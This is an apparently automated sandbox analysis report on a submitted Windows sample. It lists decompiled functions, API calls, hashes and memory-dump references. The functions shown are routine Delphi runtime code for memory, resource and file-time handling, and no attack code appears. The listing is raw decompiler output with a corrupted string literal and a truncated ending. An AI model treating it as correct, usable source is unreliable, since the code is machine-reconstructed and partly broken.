                                                                                                                                                                                          • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001), ref: 004063EF
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.281399107.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.281394755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281471508.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281478978.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281905058.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281915089.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_A1FsbRkm5m.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                                                                                                                                                                          • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                                                                                                          • API String ID: 1599918012-2375825460
                                                                                                                                                                                          • Opcode ID: ad1adbca5f22a3984e9f6b7bbf1ccb56e9755cc0a9101fe12dfbbefd2265db37
                                                                                                                                                                                          • Instruction ID: b1d3fb610801afc069037103d2f87a16e6e0ad9f86a4084b42d9068a75e18736
                                                                                                                                                                                          • Opcode Fuzzy Hash: ad1adbca5f22a3984e9f6b7bbf1ccb56e9755cc0a9101fe12dfbbefd2265db37
                                                                                                                                                                                          • Instruction Fuzzy Hash: 20319171E0025C6AFB26D6B89C46BDF7BAC8B44344F4501F7AA05F61C2E6788E848B94
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004099E0 Relevance: 6.0, APIs: 4, Instructions: 37timefileCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E004099E0(void* __eax) {
				short _v6;
				short _v8;
				struct _FILETIME _v16;
				struct _WIN32_FIND_DATAA _v336;
				void* _t16;

				_t16 = FindFirstFileA(E00404E80(__eax),  &_v336); // executed
				if(_t16 == 0xffffffff) {
					L3:
					_v8 = 0xffffffff;
				} else {
					FindClose(_t16);
					if((_v336.dwFileAttributes & 0x00000010) != 0) {
						goto L3;
					} else {
						FileTimeToLocalFileTime( &(_v336.ftLastWriteTime),  &_v16);
						if(FileTimeToDosDateTime( &_v16,  &_v6,  &_v8) == 0) {
							goto L3;
						}
					}
				}
				return _v8;
			}








                                                                                                                                                                                          0x004099fb
                                                                                                                                                                                          0x00409a03
                                                                                                                                                                                          0x00409a39
                                                                                                                                                                                          0x00409a39
                                                                                                                                                                                          0x00409a05
                                                                                                                                                                                          0x00409a06
                                                                                                                                                                                          0x00409a12
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00409a14
                                                                                                                                                                                          0x00409a1f
                                                                                                                                                                                          0x00409a37
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00409a37
                                                                                                                                                                                          0x00409a12
                                                                                                                                                                                          0x00409a47

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • FindFirstFileA.KERNEL32(00000000,?), ref: 004099FB
                                                                                                                                                                                          • FindClose.KERNEL32(00000000,00000000,?), ref: 00409A06
                                                                                                                                                                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00409A1F
                                                                                                                                                                                          • FileTimeToDosDateTime.KERNEL32 ref: 00409A30
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.281399107.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.281394755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281471508.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281478978.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281905058.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281915089.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_A1FsbRkm5m.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FileTime$Find$CloseDateFirstLocal
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2659516521-0
                                                                                                                                                                                          • Opcode ID: 8260cc7e23bb950901b1fe7feff768f5a598361a0acbd4b33f51618969189df4
                                                                                                                                                                                          • Instruction ID: bf488b194f2b476f169b407b0835a29ee4c7e870b59a6eb425f81542ff1916d2
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8260cc7e23bb950901b1fe7feff768f5a598361a0acbd4b33f51618969189df4
                                                                                                                                                                                          • Instruction Fuzzy Hash: 6CF01871D0024CA6CB11DAE58C85ACFB3AC5F04324F1047B7B519F21D2EA389F049B95
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0041A81C Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 249 41a81c-41a82b 250 41a833-41a84a call 404e80 FindResourceA 249->250 251 41a82d 249->251 254 41a899-41a89e 250->254 255 41a84c-41a873 call 41e0d0 call 41da30 250->255 251->250 259 41a878-41a88f call 403bec 255->259
                                                                                                                                                                                          C-Code - Quality: 65%
                                                                                                                                                                                          			E0041A81C(void* __eax, struct HINSTANCE__* __edx) {
				intOrPtr _v8;
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t10;
				intOrPtr _t15;
				struct HINSTANCE__* _t20;
				intOrPtr* _t22;
				intOrPtr _t30;
				void* _t32;
				intOrPtr* _t35;
				intOrPtr _t38;
				intOrPtr _t40;

				_t38 = _t40;
				_push(_t22);
				_t35 = _t22;
				_t20 = __edx;
				_t32 = __eax;
				if(__edx == 0) {
					_t20 =  *0x49e668; // 0x400000
				}
				_t10 = FindResourceA(_t20, E00404E80(_t32), 0xa) & 0xffffff00 | _t9 != 0x00000000;
				_t43 = _t10;
				if(_t10 == 0) {
					return _t10;
				} else {
					_v8 = E0041E0D0(_t20, 1, 0xa, _t32);
					_push(_t38);
					_push(0x41a890);
					_push( *[fs:eax]);
					 *[fs:eax] = _t40;
					_t15 = E0041DA30(_v8, _t20,  *_t35, _t32, _t35, _t43); // executed
					 *_t35 = _t15;
					_pop(_t30);
					 *[fs:eax] = _t30;
					_push(E0041A897);
					return E00403BEC(_v8);
				}
			}


















                                                                                                                                                                                          0x0041a81d
                                                                                                                                                                                          0x0041a81f
                                                                                                                                                                                          0x0041a823
                                                                                                                                                                                          0x0041a825
                                                                                                                                                                                          0x0041a827
                                                                                                                                                                                          0x0041a82b
                                                                                                                                                                                          0x0041a82d
                                                                                                                                                                                          0x0041a82d
                                                                                                                                                                                          0x0041a845
                                                                                                                                                                                          0x0041a848
                                                                                                                                                                                          0x0041a84a
                                                                                                                                                                                          0x0041a89e
                                                                                                                                                                                          0x0041a84c
                                                                                                                                                                                          0x0041a85d
                                                                                                                                                                                          0x0041a862
                                                                                                                                                                                          0x0041a863
                                                                                                                                                                                          0x0041a868
                                                                                                                                                                                          0x0041a86b
                                                                                                                                                                                          0x0041a873
                                                                                                                                                                                          0x0041a878
                                                                                                                                                                                          0x0041a87c
                                                                                                                                                                                          0x0041a87f
                                                                                                                                                                                          0x0041a882
                                                                                                                                                                                          0x0041a88f
                                                                                                                                                                                          0x0041a88f

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • FindResourceA.KERNEL32(?,00000000,0000000A), ref: 0041A83E
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.281399107.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.281394755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281471508.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281478978.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281905058.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281915089.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_A1FsbRkm5m.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FindResource
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1635176832-0
                                                                                                                                                                                          • Opcode ID: 1f0f77f61c370d43777ca3830916bf5545215fc97a5c03c6e6324103791e270a
                                                                                                                                                                                          • Instruction ID: 3fa3efa78a76847535e85a5113efc15ba7d11e1912711d246983766bb9fbce65
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1f0f77f61c370d43777ca3830916bf5545215fc97a5c03c6e6324103791e270a
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1E014771304300ABE301EF6AEC42EAAB7ADEB88728711407EF504C7381DA79AC028258
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00401B60 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 62COMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          C-Code - Quality: 72%
                                                                                                                                                                                          			E00401B60() {
				void* _t2;
				void* _t3;
				void* _t14;
				intOrPtr* _t19;
				intOrPtr _t23;
				intOrPtr _t26;
				intOrPtr _t28;

				_t26 = _t28;
				if( *0x49e5c4 == 0) {
					return _t2;
				} else {
					_push(_t26);
					_push(E00401C36);
					_push( *[fs:edx]);
					 *[fs:edx] = _t28;
					if( *0x49e04d != 0) {
						_push(0x49e5cc);
						L004013F8();
					}
					 *0x49e5c4 = 0;
					_t3 =  *0x49e624; // 0x0
					LocalFree(_t3);
					 *0x49e624 = 0;
					_t19 =  *0x49e5ec; // 0x49e5ec
					while(_t19 != 0x49e5ec) {
						_t1 = _t19 + 8; // 0x0
						VirtualFree( *_t1, 0, 0x8000); // executed
						_t19 =  *_t19;
					}
					E00401460(0x49e5ec);
					E00401460(0x49e5fc);
					E00401460(0x49e628);
					_t14 =  *0x49e5e4; // 0x0
					while(_t14 != 0) {
						 *0x49e5e4 =  *_t14;
						LocalFree(_t14);
						_t14 =  *0x49e5e4; // 0x0
					}
					_pop(_t23);
					 *[fs:eax] = _t23;
					_push(0x401c3d);
					if( *0x49e04d != 0) {
						_push(0x49e5cc);
						L00401400();
					}
					_push(0x49e5cc);
					L00401408();
					return 0;
				}
			}










                                                                                                                                                                                          0x00401b61
                                                                                                                                                                                          0x00401b6b
                                                                                                                                                                                          0x00401c3f
                                                                                                                                                                                          0x00401b71
                                                                                                                                                                                          0x00401b73
                                                                                                                                                                                          0x00401b74
                                                                                                                                                                                          0x00401b79
                                                                                                                                                                                          0x00401b7c
                                                                                                                                                                                          0x00401b86
                                                                                                                                                                                          0x00401b88
                                                                                                                                                                                          0x00401b8d
                                                                                                                                                                                          0x00401b8d
                                                                                                                                                                                          0x00401b92
                                                                                                                                                                                          0x00401b99
                                                                                                                                                                                          0x00401b9f
                                                                                                                                                                                          0x00401ba6
                                                                                                                                                                                          0x00401bab
                                                                                                                                                                                          0x00401bc5
                                                                                                                                                                                          0x00401bba
                                                                                                                                                                                          0x00401bbe
                                                                                                                                                                                          0x00401bc3
                                                                                                                                                                                          0x00401bc3
                                                                                                                                                                                          0x00401bd2
                                                                                                                                                                                          0x00401bdc
                                                                                                                                                                                          0x00401be6
                                                                                                                                                                                          0x00401beb
                                                                                                                                                                                          0x00401bf2
                                                                                                                                                                                          0x00401bf6
                                                                                                                                                                                          0x00401bfd
                                                                                                                                                                                          0x00401c02
                                                                                                                                                                                          0x00401c07
                                                                                                                                                                                          0x00401c0d
                                                                                                                                                                                          0x00401c10
                                                                                                                                                                                          0x00401c13
                                                                                                                                                                                          0x00401c1f
                                                                                                                                                                                          0x00401c21
                                                                                                                                                                                          0x00401c26
                                                                                                                                                                                          0x00401c26
                                                                                                                                                                                          0x00401c2b
                                                                                                                                                                                          0x00401c30
                                                                                                                                                                                          0x00401c35
                                                                                                                                                                                          0x00401c35

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • RtlEnterCriticalSection.KERNEL32(Function_0009E5CC,00000000,00401C36), ref: 00401B8D
                                                                                                                                                                                          • LocalFree.KERNEL32(00000000,00000000,00401C36), ref: 00401B9F
                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,00401C36), ref: 00401BBE
                                                                                                                                                                                          • LocalFree.KERNEL32(00000000,00000000,00000000,00401C36), ref: 00401BFD
                                                                                                                                                                                          • RtlLeaveCriticalSection.KERNEL32(Function_0009E5CC,00401C3D), ref: 00401C26
                                                                                                                                                                                          • RtlDeleteCriticalSection.KERNEL32(Function_0009E5CC,00401C3D), ref: 00401C30
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.281399107.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.281394755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281471508.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281478978.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281905058.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281915089.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_A1FsbRkm5m.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                                                                                                                                          • String ID: (I$I
                                                                                                                                                                                          • API String ID: 3782394904-2351459270
                                                                                                                                                                                          • Opcode ID: 9f8810575637edab4c47e499dd9e800e95505fd11f6ffcb64adb6a0ff56ad0c0
                                                                                                                                                                                          • Instruction ID: 63aebc4cd3b04fdf267fff4595653c8a60232739778a968a80e4263db5fe1b04
                                                                                                                                                                                          • Opcode Fuzzy Hash: 9f8810575637edab4c47e499dd9e800e95505fd11f6ffcb64adb6a0ff56ad0c0
                                                                                                                                                                                          • Instruction Fuzzy Hash: D111AC706042407EEB21EBA79D55B163BD8A71571CF91407BF004A62F2E67CAC00CB2E
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00401A9C Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 48memoryCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          C-Code - Quality: 68%
                                                                                                                                                                                          			E00401A9C() {
				void* _t11;
				signed int _t13;
				intOrPtr _t19;
				void* _t20;
				intOrPtr _t23;

				_push(_t23);
				_push("\xef\xbf\xb				_push( *[fs:edx]);
				 *[fs:edx] = _t23;
				_push(0x49e5cc);
				L004013F0();
				if( *0x49e04d != 0) {
					_push(0x49e5cc);
					L004013F8();
				}
				E00401460(0x49e5ec);
				E00401460(0x49e5fc);
				E00401460(0x49e628);
				_t11 = LocalAlloc(0, 0xff8); // executed
				 *0x49e624 = _t11;
				if( *0x49e624 != 0) {
					_t13 = 3;
					do {
						_t20 =  *0x49e624; // 0x0
						 *((intOrPtr*)(_t20 + _t13 * 4 - 0xc)) = 0;
						_t13 = _t13 + 1;
					} while (_t13 != 0x401);
					 *((intOrPtr*)(0x49e610)) = 0x49e60c;
					 *0x49e60c = 0x49e60c;
					 *0x49e618 = 0x49e60c;
					 *0x49e5c4 = 1;
				}
				_pop(_t19);
				 *[fs:eax] = _t19;
				_push(E00401B59);
				if( *0x49e04d != 0) {
					_push(0x49e5cc);
					L00401400();
					return 0;
				}
				return 0;
			}








                                                                                                                                                                                          0x00401aa1
                                                                                                                                                                                          0x00401aa2
                                                                                                                                                                                          0x00401aa7
                                                                                                                                                                                          0x00401aaa
                                                                                                                                                                                          0x00401aad
                                                                                                                                                                                          0x00401ab2
                                                                                                                                                                                          0x00401abe
                                                                                                                                                                                          0x00401ac0
                                                                                                                                                                                          0x00401ac5
                                                                                                                                                                                          0x00401ac5
                                                                                                                                                                                          0x00401acf
                                                                                                                                                                                          0x00401ad9
                                                                                                                                                                                          0x00401ae3
                                                                                                                                                                                          0x00401aef
                                                                                                                                                                                          0x00401af4
                                                                                                                                                                                          0x00401b00
                                                                                                                                                                                          0x00401b02
                                                                                                                                                                                          0x00401b07
                                                                                                                                                                                          0x00401b07
                                                                                                                                                                                          0x00401b0f
                                                                                                                                                                                          0x00401b13
                                                                                                                                                                                          0x00401b14
                                                                                                                                                                                          0x00401b20
                                                                                                                                                                                          0x00401b23
                                                                                                                                                                                          0x00401b25
                                                                                                                                                                                          0x00401b2a
                                                                                                                                                                                          0x00401b2a
                                                                                                                                                                                          0x00401b33
                                                                                                                                                                                          0x00401b36
                                                                                                                                                                                          0x00401b39
                                                                                                                                                                                          0x00401b45
                                                                                                                                                                                          0x00401b47
                                                                                                                                                                                          0x00401b4c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00401b4c
                                                                                                                                                                                          0x00401b51

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • RtlInitializeCriticalSection.KERNEL32(0049E5CC,00000000,',?,?,00402336,024E0000,?,00000000,?,?,00401D25,00401D3A,00401E8B), ref: 00401AB2
                                                                                                                                                                                          • RtlEnterCriticalSection.KERNEL32(0049E5CC,0049E5CC,00000000,',?,?,00402336,024E0000,?,00000000,?,?,00401D25,00401D3A,00401E8B), ref: 00401AC5
                                                                                                                                                                                          • LocalAlloc.KERNEL32(00000000,00000FF8,0049E5CC,00000000,',?,?,00402336,024E0000,?,00000000,?,?,00401D25,00401D3A,00401E8B), ref: 00401AEF
                                                                                                                                                                                          • RtlLeaveCriticalSection.KERNEL32(0049E5CC,00401B59,00000000,',?,?,00402336,024E0000,?,00000000,?,?,00401D25,00401D3A,00401E8B), ref: 00401B4C
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.281399107.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.281394755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281471508.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281478978.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281905058.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281915089.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_A1FsbRkm5m.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                                                                                                                                          • String ID: (I$'$I
                                                                                                                                                                                          • API String ID: 730355536-3463978989
                                                                                                                                                                                          • Opcode ID: 75eea6cd1ad15cfb1e46afda1a9ce73b7035c2e84f6dcfcc3888624585293549
                                                                                                                                                                                          • Instruction ID: dfc13510ffc652cdc4745fa131ecd9d2d70f716ade9f6bddb0b8d8da957d249b
                                                                                                                                                                                          • Opcode Fuzzy Hash: 75eea6cd1ad15cfb1e46afda1a9ce73b7035c2e84f6dcfcc3888624585293549
                                                                                                                                                                                          • Instruction Fuzzy Hash: E201AD70204240AEE716EB6B9816B153BD4D76970CF85807FF000A77F2E6BC6840CA1E
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00402188 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 124COMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 82 402188-40219a 83 4021a5-4021ab 82->83 84 40219c call 401a9c 82->84 86 4021b7-4021cc 83->86 87 4021ad-4021b2 83->87 88 4021a1-4021a3 84->88 90 4021d8-4021e1 86->90 91 4021ce-4021d3 RtlEnterCriticalSection 86->91 89 40230b-402314 87->89 88->83 88->87 92 4021e3 90->92 93 4021e8-4021ee 90->93 91->90 92->93 94 4021f4-4021f8 93->94 95 402287-40228d 93->95 98 4021fa 94->98 99 4021fd-40220c 94->99 96 4022d9-4022db call 402094 95->96 97 40228f-40229c 95->97 104 4022e0-4022f7 96->104 100 4022ab-4022d7 call 404424 97->100 101 40229e-4022a6 97->101 98->99 99->95 102 40220e-40221c 99->102 100->89 101->100 106 402238-40223c 102->106 107 40221e-402222 102->107 110 402303 104->110 111 4022f9-4022fe RtlLeaveCriticalSection 104->111 112 402241-40225c 106->112 113 40223e 106->113 108 402224 107->108 109 402227-402236 107->109 108->109 115 40225e-402282 call 404424 109->115 111->110 112->115 113->112 115->89
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00401A9C: RtlInitializeCriticalSection.KERNEL32(0049E5CC,00000000,',?,?,00402336,024E0000,?,00000000,?,?,00401D25,00401D3A,00401E8B), ref: 00401AB2
                                                                                                                                                                                            • Part of subcall function 00401A9C: RtlEnterCriticalSection.KERNEL32(0049E5CC,0049E5CC,00000000,',?,?,00402336,024E0000,?,00000000,?,?,00401D25,00401D3A,00401E8B), ref: 00401AC5
                                                                                                                                                                                            • Part of subcall function 00401A9C: LocalAlloc.KERNEL32(00000000,00000FF8,0049E5CC,00000000,',?,?,00402336,024E0000,?,00000000,?,?,00401D25,00401D3A,00401E8B), ref: 00401AEF
                                                                                                                                                                                            • Part of subcall function 00401A9C: RtlLeaveCriticalSection.KERNEL32(0049E5CC,00401B59,00000000,',?,?,00402336,024E0000,?,00000000,?,?,00401D25,00401D3A,00401E8B), ref: 00401B4C
                                                                                                                                                                                          • RtlEnterCriticalSection.KERNEL32(0049E5CC,00000000,7 ), ref: 004021D3
                                                                                                                                                                                          • RtlLeaveCriticalSection.KERNEL32(0049E5CC,0040230B), ref: 004022FE
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.281399107.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.281394755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281471508.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281478978.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281905058.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281915089.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_A1FsbRkm5m.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CriticalSection$EnterLeave$AllocInitializeLocal
                                                                                                                                                                                          • String ID: 7
                                                                                                                                                                                          • API String ID: 2227675388-1331172448
                                                                                                                                                                                          • Opcode ID: d57fdd7a51c297de22ae7a43f37e9dc48cc1f2cd16773fd01e790cee451199b4
                                                                                                                                                                                          • Instruction ID: 4af8bea66c2055acf7768281f877aa53f35be4b0bc747d0b7dec25e4a478ddf4
                                                                                                                                                                                          • Opcode Fuzzy Hash: d57fdd7a51c297de22ae7a43f37e9dc48cc1f2cd16773fd01e790cee451199b4
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8441E2B1A04200DFD715CFAADE9562977E0FB68328B6542BFD401E77E1E2799C41CB08
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004015B4 Relevance: 4.5, APIs: 2, Strings: 1, Instructions: 37memoryCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 118 4015b4-4015c1 119 4015c3-4015c8 118->119 120 4015ca-4015d0 118->120 121 4015d6-4015ee VirtualAlloc 119->121 120->121 122 4015f0-4015fe call 401468 121->122 123 401613-401616 121->123 122->123 126 401600-401611 VirtualFree 122->126 126->123
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E004015B4(void* __eax, void** __edx) {
				void* _t3;
				void** _t8;
				void* _t11;
				long _t14;

				_t8 = __edx;
				if(__eax >= 0x100000) {
					_t14 = __eax + 0x0000ffff & 0xffff0000;
				} else {
					_t14 = 0x100000;
				}
				_t8[1] = _t14;
				_t3 = VirtualAlloc(0, _t14, 0x2000, 1); // executed
				_t11 = _t3;
				 *_t8 = _t11;
				if(_t11 != 0) {
					_t3 = E00401468(0x49e5ec, _t8);
					if(_t3 == 0) {
						VirtualFree( *_t8, 0, 0x8000);
						 *_t8 = 0;
						return 0;
					}
				}
				return _t3;
			}







                                                                                                                                                                                          0x004015b7
                                                                                                                                                                                          0x004015c1
                                                                                                                                                                                          0x004015d0
                                                                                                                                                                                          0x004015c3
                                                                                                                                                                                          0x004015c3
                                                                                                                                                                                          0x004015c3
                                                                                                                                                                                          0x004015d6
                                                                                                                                                                                          0x004015e3
                                                                                                                                                                                          0x004015e8
                                                                                                                                                                                          0x004015ea
                                                                                                                                                                                          0x004015ee
                                                                                                                                                                                          0x004015f7
                                                                                                                                                                                          0x004015fe
                                                                                                                                                                                          0x0040160a
                                                                                                                                                                                          0x00401611
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00401611
                                                                                                                                                                                          0x004015fe
                                                                                                                                                                                          0x00401616

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,004018BD), ref: 004015E3
                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,004018BD), ref: 0040160A
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.281399107.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.281394755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281471508.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281478978.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281905058.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281915089.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_A1FsbRkm5m.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Virtual$AllocFree
                                                                                                                                                                                          • String ID: I
                                                                                                                                                                                          • API String ID: 2087232378-1966777607
                                                                                                                                                                                          • Opcode ID: c1566d8f6abf6d80f03d096eeda82e70b725eacd03a30ec4fb637c5d0c7dd738
                                                                                                                                                                                          • Instruction ID: 653e09eb2cf8d2b73dae0cb6bd44d4e3f867a6d1f4cfde1ef7f913290877d0a1
